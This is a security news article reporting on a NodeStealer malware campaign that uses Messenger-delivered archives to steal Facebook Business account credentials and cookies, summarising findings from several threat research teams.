NodeStealer Takes Aim at Business Accounts on Facebook

In an ongoing campaign, Facebook Business accounts are being targeted with deceptive messages aimed at collecting victims' credentials. These messages are part of a campaign utilizing a variant of the Python-based NodeStealer malware, potentially allowing attackers to gain control of these accounts for subsequent malicious activities.

According to Jan Michael, a researcher at Netskope Threat Labs, the attacks are primarily affecting victims in Southern Europe and North America, spanning various industries but with a particular focus on manufacturing services and technology sectors.

NodeStealer, initially identified by Meta in May 2023, was originally a JavaScript-based malware designed to steal cookies and passwords from web browsers, compromising accounts on platforms like Facebook, Gmail, and Outlook.

Palo Alto Networks Unit 42 recently disclosed a separate attack wave that occurred in December 2022, involving a Python version of NodeStealer, some of which were adapted to facilitate cryptocurrency theft.

Netskope's latest findings suggest that the Vietnamese threat actors responsible for these attacks have likely resumed their efforts, and they may have adopted tactics used by other threat actors in the same region with similar objectives.

NodeStealer Delivered in Archives Over Malicious Messages

Earlier this week, Guardio Labs revealed a related tactic involving fraudulent messages sent via Facebook Messenger, originating from a botnet of fake and compromised personal accounts. These messages deliver ZIP or RAR archive files containing the NodeStealer malware to unsuspecting recipients.

This same method serves as the initial means to distribute RAR files hosted on Facebook's content delivery network (CDN). These archives use images of defective products as bait to persuade Facebook business page owners or admins to download the malware payload.

Upon execution, a batch script opens the Chrome web browser and redirects the victim to a benign web page. Simultaneously, a PowerShell command runs in the background to retrieve additional payloads, including the Python interpreter and the NodeStealer malware.

The NodeStealer malware, besides capturing credentials and cookies from various web browsers, is designed to collect system metadata and transmit this information over Telegram.

Compared to earlier versions, this new NodeStealer variant employs batch files to download and execute Python scripts, enabling it to steal credentials and cookies from multiple browsers and websites.